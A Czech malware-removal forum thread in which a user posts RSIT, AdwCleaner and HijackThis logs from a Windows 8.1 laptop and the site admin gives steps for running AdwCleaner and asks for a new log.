File C:\WINDOWS\system32\services.exe is digitally signed
File C:\WINDOWS\system32\User32.dll is digitally signed
File C:\WINDOWS\SysWOW64\User32.dll is digitally signed
File C:\WINDOWS\system32\userinit.exe is digitally signed
File C:\WINDOWS\SysWOW64\userinit.exe is digitally signed
File C:\WINDOWS\system32\rpcss.dll is digitally signed
File C:\WINDOWS\system32\Drivers\volsnap.sys is digitally signed

====== List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled) ======

R0 aswbidsh;aswbidsh; C:\WINDOWS\system32\drivers\aswbidsha.sys [2017-04-26 189768]
R0 aswblog;aswblog; C:\WINDOWS\system32\drivers\aswbloga.sys [2017-04-26 334088]
R0 aswbuniv;aswbuniv; C:\WINDOWS\system32\drivers\aswbuniva.sys [2017-04-26 48528]
R0 aswRvrt;aswRvrt; C:\WINDOWS\system32\drivers\aswRvrt.sys [2017-04-26 75704]
R0 aswVmm;aswVmm; C:\WINDOWS\system32\drivers\aswVmm.sys [2017-04-26 339696]
R0 BTATH_BUS;@oem16.inf,%BTATH_BUS.SVCDESC%;Qualcomm Atheros Bluetooth Bus; C:\WINDOWS\System32\drivers\btath_bus.sys [2014-02-26 35016]
R1 aswbidsdriver;aswbidsdriver; C:\WINDOWS\system32\drivers\aswbidsdrivera.sys [2017-04-26 307736]
R1 aswKbd;aswKbd; C:\WINDOWS\system32\drivers\aswKbd.sys [2017-04-26 32600]
R1 aswRdr;aswRdr; C:\WINDOWS\system32\drivers\aswRdr2.sys [2017-04-26 101152]
R1 aswSnx;aswSnx; C:\WINDOWS\system32\drivers\aswSnx.sys [2017-04-26 1005048]
R1 aswSP;aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [2017-04-28 556784]
R1 vwififlt;@%SystemRoot%\System32\drivers\vwififlt.sys,-259; C:\WINDOWS\system32\DRIVERS\vwififlt.sys [2016-08-13 71680]
R2 aswMonFlt;aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [2017-04-28 128648]
R2 aswStm;aswStm; C:\WINDOWS\system32\drivers\aswStm.sys [2017-04-26 164064]
R2 SSPORT;SSPORT; \??\C:\WINDOWS\system32\Drivers\SSPORT.sys [2009-07-11 11576]
R3 athr;@oem15.inf,%ATHR.Service.DispName%;Qualcomm Atheros Extensible Wireless LAN device driver; C:\WINDOWS\system32\DRIVERS\athwbx.sys [2014-02-14 3888640]
R3 BtFilter;BtFilter; C:\WINDOWS\system32\DRIVERS\btfilter.sys [2014-02-26 598216]
R3 BTHUSB;@bth.inf,%BTHUSB.SvcDesc%;Ovladač rozhraní USB radiostanice Bluetooth; C:\WINDOWS\System32\Drivers\BTHUSB.sys [2014-10-29 81920]
R3 iaioi2c;@oem2.inf,%Driver_Service.Desc%;I2C Controller Service; C:\WINDOWS\System32\drivers\iaioi2ce.sys [2013-11-11 67584]
R3 igfx;igfx; C:\WINDOWS\system32\DRIVERS\igdkmd64.sys [2014-03-07 3729920]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RTKVHD64.sys [2014-03-25 3903320]
R3 IntcDAud;@oem7.inf,%IntcDAud.SvcDesc%;Intel(R) Display Audio; C:\WINDOWS\system32\DRIVERS\IntcDAud.sys [2014-03-07 450520]
R3 iwdbus;@oem10.inf,%iwdbus.SVCDESC%;IWD Bus Enumerator; C:\WINDOWS\System32\drivers\iwdbus.sys [2014-03-01 27032]
R3 RTL8168;@oem11.inf,%rtl8168.Service.DispName%;Realtek 8168 NT Driver; C:\WINDOWS\system32\DRIVERS\Rt630x64.sys [2013-12-18 839896]
R3 RTSPER;@oem14.inf,%Rts5227PER%;Realtek PCIE Card Reader - PER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [2013-12-20 461528]
R3 SynRMIHID;@oem13.inf,%SynRMIHID.SVCDESC%;Synaptics HID Service; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [2014-02-19 42224]
R3 TXEIx64;@oem12.inf,%TEE_SvcDesc%;Intel(R) Trusted Execution Engine Interface ; C:\WINDOWS\System32\drivers\TXEIx64.sys [2014-01-15 88592]
R3 usbvideo;@usbvideo.inf,%USBVideo.SvcDesc%;USB Video Device (WDM); C:\WINDOWS\System32\Drivers\usbvideo.sys [2014-06-21 212736]
R3 vwifimp;@%SystemRoot%\System32\drivers\vwifimp.sys,-261; C:\WINDOWS\system32\DRIVERS\vwifimp.sys [2016-08-13 38912]
S3 aswHwid;aswHwid; C:\WINDOWS\system32\drivers\aswHwid.sys [2017-04-26 38296]
S3 AthBTPort;@oem19.inf,%BTHSUPPORT.SvcDesc%;Qualcomm Atheros Virtual Bluetooth Class; C:\WINDOWS\system32\DRIVERS\btath_flt.sys [2014-02-26 89800]
S3 BTATH_A2DP;@oem18.inf,%BTATH_A2DP.SvcDesc%;Bluetooth A2DP Audio Driver; C:\WINDOWS\system32\drivers\btath_a2dp.sys [2014-02-26 355528]
S3 btath_avdt;@oem18.inf,%btath_avdt.SvcDesc%;Qualcomm Atheros Bluetooth AVDT Service; C:\WINDOWS\system32\drivers\btath_avdt.sys [2014-02-26 118984]
S3 BTATH_HCRP;@oem21.inf,%BTATH_HCRP.SvcDesc%;Bluetooth HCRP Server driver; C:\WINDOWS\System32\drivers\btath_hcrp.sys [2014-02-26 179432]
S3 BTATH_LWFLT;@oem23.inf,%BTATH_LWFLT%;Bluetooth LWFLT Device; C:\WINDOWS\system32\DRIVERS\btath_lwflt.sys [2014-02-26 77464]
S3 BTATH_RCP;@oem25.inf,%BTATH_RCP%;Bluetooth AVRCP Device; C:\WINDOWS\System32\drivers\btath_rcp.sys [2014-02-26 137928]
S3 BthEnum;@bth.inf,%BthEnum.SVCDESC%;Bluetooth Enumerator Service; C:\WINDOWS\System32\drivers\BthEnum.sys [2014-10-29 53248]
S3 BthLEEnum;@bthleenum.inf,%BthLEEnum.SVCDESC%;Bluetooth Low Energy Driver; C:\WINDOWS\system32\DRIVERS\BthLEEnum.sys [2014-03-18 226304]
S3 BthPan;@bthpan.inf,%BthPan.DisplayName%;Bluetooth Device (Personal Area Network); C:\WINDOWS\System32\drivers\bthpan.sys [2017-07-06 119296]
S3 BTHPORT;@bth.inf,%BTHPORT.SvcDesc%;Ovladač portu Bluetooth; C:\WINDOWS\System32\Drivers\BTHport.sys [2015-05-11 1201664]
S3 dot4;@oem42.inf,%Dot4_Name%;MS IEEE-1284.4 Driver; C:\WINDOWS\system32\DRIVERS\Dot4.sys [2012-10-19 151968]
S3 Dot4Print;@oem43.inf,%Dot4Print_Name%;Print Class Driver for IEEE-1284.4; C:\WINDOWS\System32\drivers\Dot4Prt.sys [2012-10-19 27040]
S3 dot4usb;@oem42.inf,%DOT4USB_NAME%;Dot4USB Filter; C:\WINDOWS\system32\DRIVERS\dot4usb.sys [2012-10-19 49056]
S3 GPIO;@oem1.inf,%GPIO.SVCDESC%;Intel SoC GPIO Controller Driver; C:\WINDOWS\System32\drivers\iaiogpioe.sys [2013-11-11 31232]
S3 intaud_WaveExtensible;@oem9.inf,%INTAUD_WEX.SvcDesc%;Intel WiDi Audio Device; C:\WINDOWS\system32\drivers\intelaud.sys [2014-03-01 38296]
S3 LMDriver;@oem20.inf,%LMDriver.SVCDESC%;Launch Manager Wireless Driver; C:\WINDOWS\System32\drivers\LMDriver.sys [2013-07-17 21360]
S3 massfilter;@oem34.inf,%filter.SvcDesc%;MBB Mass Storage Filter Driver; C:\WINDOWS\System32\drivers\massfilter.sys []
S3 RadioShim;@oem20.inf,%RadioShim.SVCDESC%;Shim for HID-KMDF Interface layer; C:\WINDOWS\System32\drivers\RadioShim.sys [2013-07-17 14680]
S3 RFCOMM;@tdibth.inf,%RFCOMM.DisplayName%;Bluetooth Device (RFCOMM Protocol TDI); C:\WINDOWS\System32\drivers\rfcomm.sys [2015-01-30 167424]
S3 usbscan;@sti.inf,%usbscan.SvcDesc%;Ovladač skeneru USB; C:\WINDOWS\System32\drivers\usbscan.sys [2014-10-29 44544]
S4 VBoxAswDrv;VBoxAsw Support Driver; \??\C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys []

====== List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled) ======

R2 602XML Updater;602Updater; C:\Program Files (x86)\Common Files\soft602\602updsvc\602updsvc.exe [2011-10-10 85344]
R2 AdobeARMservice;Adobe Acrobat Update Service; c:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2017-04-25 83056]
R2 AtherosSvc;AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [2014-02-26 319104]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2017-04-26 261712]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; %SystemRoot%\System32\svchost.exe -k utcsvc;"ServiceDll" = %SystemRoot%\system32\diagtrack.dll
R2 GamesAppIntegrationService;GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [2016-03-04 350064]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2017-07-06 321896]
R2 igfxCUIService1.0.0.0;Intel(R) HD Graphics Control Panel Service; C:\WINDOWS\system32\igfxCUIService.exe [2014-03-18 282096]
R2 IJPLMSVC;Canon Inkjet Printer/Scanner/Fax Extended Survey Program; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [2013-06-28 84616]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [2013-07-02 733696]
R2 ssinstall;SInstalátor; C:\WINDOWS\SysWOW64\ssins.exe [2017-07-06 4696960]
R2 TeamViewer;TeamViewer 11; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [2017-04-06 7757040]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2017-04-26 7398336]
R3 FontCache3.0.0.0;@%SystemRoot%\system32\PresentationHost.exe,-3309; C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe [2014-03-18 43696]
R3 osppsvc;Office Software Protection Platform; C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
R3 QASvc;Quick Access Service; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [2014-04-28 457960]
R3 RMSvc;Quick Access RadioMgr Service; C:\Program Files\Acer\Acer Quick Access\RMSvc.exe [2014-04-28 449768]
R3 UEIPSvc;User Experience Improvement Program; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [2014-01-25 222952]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-07-12 272384]
S3 BthHFSrv;@%SystemRoot%\System32\BthHFSrv.dll,-103; %SystemRoot%\System32\svchost.exe -k LocalServiceAndNoImpersonation;"ServiceDll" = %SystemRoot%\System32\BthHFSrv.dll
S3 cphs;Intel(R) Content Protection HECI Service; C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe [2014-03-18 279024]
S3 GamesAppService;GamesAppService; C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2016-03-04 210288]
S3 ICCS;Intel(R) Integrated Clock Controller Service - Intel(R) ICCS; C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe [2012-04-24 169752]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [2013-07-02 822232]
S3 Microsoft SharePoint Workspace Audit Service;Microsoft SharePoint Workspace Audit Service; C:\Program Files\Microsoft Office\Office14\GROOVE.EXE [2013-12-19 50942144]
S3 ose64;Office 64 Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-01-09 174440]
S4 AvastVBoxSvc;AvastVBox COM Service; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe []

-----------------EOF-----------------

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118275
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prosím o kontrolu logu

#2 Příspěvek od Rudy »

Zdravím!
Spusťte tuto utilitu:
Stáhněte AdwCleaner https://toolslib.net/downloads/viewdown ... dwcleaner/
Uložte na plochu
Ukončete všechny programy
Klikněte nejprve na >Scan<(hledání) a pak na >Clean< (mazání).
Proběhne skenováni a pak se objeví log, který sem vložte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

rivano
Návštěvník
Návštěvník
Příspěvky: 93
Registrován: 18 dub 2009 08:33

Re: Prosím o kontrolu logu

#3 Příspěvek od rivano »

# AdwCleaner v6.047 - Logfile created 17/07/2017 at 18:58:06
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-07-13.1 [Server]
# Operating System : Windows 8.1 Connected (X64)
# Username : Eva Blažková - EVA
# Running from : C:\Users\Eva Blažková\Desktop\adwcleaner_6.047.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[-] Folder deleted: C:\Users\Default\AppData\Local\Pokki
[-] Folder deleted: C:\Users\Public\Pokki


***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****



***** [ Web browsers ] *****

[-] Firefox preferences cleaned: "browser.search.hiddenOneOffs" - "DuckDuckGo,Heuréka,Wikipedie (cs),Trovi search"
[-] Firefox preferences cleaned: "browser.search.selectedEngine" - "Trovi search"


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [2697 Bytes] - [22/04/2016 09:42:50]
C:\AdwCleaner\AdwCleaner[C2].txt - [1280 Bytes] - [23/04/2016 15:16:37]
C:\AdwCleaner\AdwCleaner[C3].txt - [1218 Bytes] - [17/07/2017 18:58:06]
C:\AdwCleaner\AdwCleaner[S1].txt - [2478 Bytes] - [22/04/2016 09:31:39]
C:\AdwCleaner\AdwCleaner[S2].txt - [2551 Bytes] - [22/04/2016 09:39:27]
C:\AdwCleaner\AdwCleaner[S3].txt - [1028 Bytes] - [23/04/2016 15:08:37]
C:\AdwCleaner\AdwCleaner[S4].txt - [1100 Bytes] - [23/04/2016 15:13:21]
C:\AdwCleaner\AdwCleaner[S5].txt - [1980 Bytes] - [17/07/2017 18:55:42]

########## EOF - C:\AdwCleaner\AdwCleaner[C3].txt - [1656 Bytes] ##########

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118275
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prosím o kontrolu logu

#4 Příspěvek od Rudy »

Dejte nový log RSIT.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

rivano
Návštěvník
Návštěvník
Příspěvky: 93
Registrován: 18 dub 2009 08:33

Re: Prosím o kontrolu logu

#5 Příspěvek od rivano »

Logfile of random's system information tool 1.16 (written by random/random)
Run by Eva Blažková at 2017-07-17 19:30:16
Microsoft Windows 8.1 s aplikací Bing
System drive C: has 391 GB (85%) free of 459 GB
Total RAM: 3979 MB (61% free)
X64

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:30:19, on 17. 7. 2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.18123)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\TeamViewer\TeamViewer.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files\trend micro\Eva Blažková_RSITx64.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://acer13.msn.com/?pc=ACJB
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.seznam.cz/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 85.92.34.96:80
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Canon Easy-WebPrint EX BHO - {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
O2 - BHO: ExplorerBHO Class - {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL
O2 - BHO: ClassicIEBHO Class - {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIEDLL_32.dll
O3 - Toolbar: Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
O3 - Toolbar: Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
O4 - HKLM\..\Run: [seznam-listicka-distribuce] "C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe" -s -d listicka 1 szn-software-listicka cz.seznam.software.autoupdate
O4 - HKLM\..\Run: [CanonQuickMenu] C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
O4 - HKLM\..\Run: [IJNetworkScannerSelectorEX] C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe /FORCE
O4 - HKCU\..\Run: [cz.seznam.software.autoupdate] "C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\szninstall.exe" -c
O4 - HKCU\..\Run: [cz.seznam.software.szndesktop] "C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe" -q
O4 - HKLM\..\Policies\Explorer\Run: [BtvStack] "C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe"
O4 - Startup: Výřezy obrazovky a spuštění aplikace OneNote 2010.lnk = C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office15\EXCEL.EXE/3000
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Od&eslat do aplikace OneNote - res://C:\PROGRA~1\MICROS~2\Office14\ONBttnIE.dll/105
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MICROS~2\Office15\ONBttnIE.dll/105
O9 - Extra button: Odeslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Od&eslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: (no name) - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe
O9 - Extra 'Tools' menuitem: Classic IE Settings - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe
O9 - Extra button: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: 602Updater (602XML Updater) - Software602 a.s. - C:\Program Files (x86)\Common Files\soft602\602updsvc\602updsvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - c:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software s.r.o. - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: AtherosSvc - Windows (R) Win 7 DDK provider - C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: GamesAppIntegrationService - WildTangent - C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
O23 - Service: GamesAppService - WildTangent, Inc. - C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe
O23 - Service: HP Support Solutions Framework Service (HPSupportSolutionsFrameworkService) - HP Inc. - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
O23 - Service: Intel(R) Integrated Clock Controller Service - Intel(R) ICCS (ICCS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Canon Inkjet Printer/Scanner/Fax Extended Survey Program (IJPLMSVC) - Unknown owner - C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Quick Access Service (QASvc) - Acer Incorporate - C:\Program Files\Acer\Acer Quick Access\QASvc.exe
O23 - Service: Quick Access RadioMgr Service (RMSvc) - Acer Incorporate - C:\Program Files\Acer\Acer Quick Access\RMSvc.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: SInstalátor (ssinstall) - PS Media s.r.o. - C:\WINDOWS\SysWOW64\ssins.exe
O23 - Service: TeamViewer 11 (TeamViewer) - TeamViewer GmbH - C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
O23 - Service: User Experience Improvement Program (UEIPSvc) - acer - C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 10683 bytes

====== Enumerating Processes ======

C:\WINDOWS\system32\wininit.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\Explorer.EXE
C:\Program Files\Classic Shell\ClassicStartMenu.exe
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\taskhostex.exe
"C:\Program Files (x86)\Common Files\soft602\602updsvc\602updsvc.exe"
"c:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
"C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe"
C:\WINDOWS\System32\svchost.exe -k utcsvc
"C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE"
